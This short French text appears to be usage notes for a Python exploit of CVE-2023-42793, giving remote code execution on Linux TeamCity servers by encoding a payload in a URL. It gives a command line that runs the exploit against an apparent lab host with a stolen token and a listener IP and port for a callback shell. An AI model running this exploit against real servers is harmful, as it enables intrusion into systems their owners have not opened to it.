
Exploit Python pour CVE-2023-42793 qui permet l'exécution de code à distance sur les serveurs TeamCity Linux en encodant une charge utile dans une URL et en l'envoyant à la cible.
Vous devrez d'abord obtenir le token en utilisant un autre exploit. Cependant, l'exploit suivant vous permettra d'obtenir une RCE sur le serveur Linux, car il encode la charge utile dans l'URL et l'envoie au serveur.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT